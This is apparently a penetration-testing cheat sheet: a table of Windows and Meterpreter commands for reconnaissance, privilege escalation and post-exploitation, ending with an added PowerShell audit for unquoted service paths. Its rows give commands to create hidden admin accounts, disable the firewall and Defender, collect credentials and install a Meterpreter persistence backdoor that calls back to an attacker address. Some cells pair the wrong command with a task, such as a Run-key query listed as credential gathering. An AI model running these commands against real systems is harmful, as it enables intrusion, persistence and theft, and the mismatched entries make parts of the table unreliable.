Command Group | Task | Windows Command | Meterpreter Command | Comments |
---|---|---|---|---|
Information Gathering | Get System Information | systeminfo | sysinfo | |
Information Gathering | Get Current Directory | echo %cd% | pwd | |
Information Gathering | Get Current User | echo %username% or whoami | getuid | |
Information Gathering | Show Current User Privileges | whoami /priv | run post/windows/gather/win_privs | |
Information Gathering | Find a File or Service | where | search -h; -d for directory | |
Information Gathering | Show Running Services | wmic service list brief | run post/windows/gather/enum_services | |
Information Gathering | Show Installed Applications | net start | run post/windows/gather/enum_applications | |
Information Gathering | Show Process Tree | tasklist | ps | |
Information Gathering | Show Users' User Groups | net user username | ||
Information Gathering | Check Windows Patching | wmic qfe get Caption,Description,HotFixID,InstalledOn | ||
Information Gathering | Enumerate AD Domains | net view /domains or net group "Domain Controllers" /domain | run post/windows/gather/enum_domains | |
Information Gathering | Enumerate AD Users | net user /domain | run post/windows/gather/enum_ad_users | |
Information Gathering | List Available Shares | net share | run post/windows/gather/enum_shares | |
Information Gathering | Show Computer Groups | net localgroup | ||
Information Gathering | Show User Group Association | net localgroup groupname | ||
Information Gathering | Show Logged On Users | From elevated PowerShell - Get-Process -IncludeUserName \| Select-Object -Unique -Property UserName | run post/windows/gather/enum_logged_on_users | Note that "query user" works on Win10 Pro |
Information Gathering | LDAP Enumeration | From Kali - nslookup -type=srv _ldap._tcp.els.bank \| grep ldap \| cut -d ' ' -f 6 \| sed 's/\.$//g' | | |
Network Mapping | Gather Network Interface Info | ipconfig /all | ifconfig | |
Network Mapping | Gather Routing Table Information | route print | route | |
Network Mapping | ARP Table Information | arp -a | arp | |
Network Mapping | Gather Network Connections | netstat -ano | netstat | |
Network Mapping | Show DNS Information | ipconfig /displaydns | ||
Exploitation | Create New User (if privileged) | net user username password /add | | Append /domain to modify domain account |
Exploitation | Modify User Privileges | net localgroup "Administrators" username /add | | Append /domain to modify domain account |
Exploitation | Auto-Escalate Privileges | | getsystem | |
Exploitation | Check Unquoted Service Paths | wmic service get name,displayname,pathname,startmode \|findstr /i "auto" \|findstr /i /v "C:\windows\\" \|findstr /i /v """ | | |
Exploitation | Check Service Status | sc query servicename | ||
Exploitation | Check Auto Run Programs and Services | reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | ||
Exploitation | PrintNightmare | Multiple | | |
Post-Exploitation | Gather Available Credentials | reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | run post/windows/gather/credentials/credential_collector | Also see Mimikatz |
Post-Exploitation | Create New User with Admin Privileges | net user username password /add && net localgroup "Administrators" username /add | | |
Post-Exploitation | Enable RDP on Machine | Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0; Enable-NetFirewallRule -DisplayGroup "Remote Desktop" | run getgui -e | |
Post-Exploitation | Check Firewall Status | netsh advfirewall show currentprofile | ||
Post-Exploitation | Disable Firewall | netsh advfirewall set allprofiles state off | ||
Post-Exploitation | Disable Antivirus | PowerShell - Set-MpPreference -DisableRealtimeMonitoring $true | | |
Post-Exploitation | Check Scheduled Tasks | schtasks /query /fo LIST /v | ||
Post-Exploitation | Check AutoRun Programs and Services | reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run | ||
Post-Exploitation | Persistent Back Door | | run persistence -A -X -i 5 -p 8080 -r ipaddr | |
Post-Exploitation | Grant Admin Permissions to Directories | icacls Administrator\Desktop /grant james:(OI)(CI)F /T | ||
Post-Exploitation | Autologin Credentials | reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" | ||
Post-Exploitation | FTP File Transfer | See notes | ||
Post-Exploitation | Jenkins Reverse Shell | |||
Exploitation | Responder/ntlmrelayx | |||
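As an added example that is not part of the original cheat sheet, the "Check Unquoted Service Paths" one-liner above rewritten as a PowerShell audit function that is easier to read and to run as a scheduled configuration check. It assumes an elevated prompt with CIM access to Win32_Service; `Get-UnquotedServicePath` is a name chosen here.

```powershell
# Added example, not from the original cheat sheet: audit services for the
# condition the wmic/findstr one-liner looks for (auto-start service, binary
# path not quoted, path contains a space, binary outside the Windows folder).
# Run from an elevated PowerShell prompt. Get-UnquotedServicePath is a name
# chosen for this example.
function Get-UnquotedServicePath {
    [CmdletBinding()]
    param(
        # Services under the Windows directory are skipped, matching the
        # original's `findstr /i /v "C:\windows\\"`.
        [string]$ExcludePrefix = "$env:SystemRoot\"
    )

    Get-CimInstance -ClassName Win32_Service |
        Where-Object {
            $_.PathName -and
            $_.StartMode -eq 'Auto' -and
            -not $_.PathName.StartsWith('"') -and
            -not $_.PathName.StartsWith($ExcludePrefix, [System.StringComparison]::OrdinalIgnoreCase)
        } |
        ForEach-Object {
            # Separate the executable from its arguments: keep everything up to
            # and including the first '.exe'; paths without it are kept whole.
            $exe = $_.PathName
            $idx = $exe.IndexOf('.exe', [System.StringComparison]::OrdinalIgnoreCase)
            if ($idx -ge 0) { $exe = $exe.Substring(0, $idx + 4) }

            # Only an unquoted path that contains a space is ambiguous to the
            # service loader; a space-free path is harmless even when unquoted.
            if ($exe -match ' ') {
                [pscustomobject]@{
                    Name       = $_.Name
                    StartName  = $_.StartName   # account the service runs as
                    Executable = $exe
                    PathName   = $_.PathName
                }
            }
        }
}

# Findings table; remediation is to quote the binary path, e.g.
#   sc.exe config <Name> binPath= "\"<full path to exe>\" <arguments>"
Get-UnquotedServicePath | Format-Table -AutoSize
```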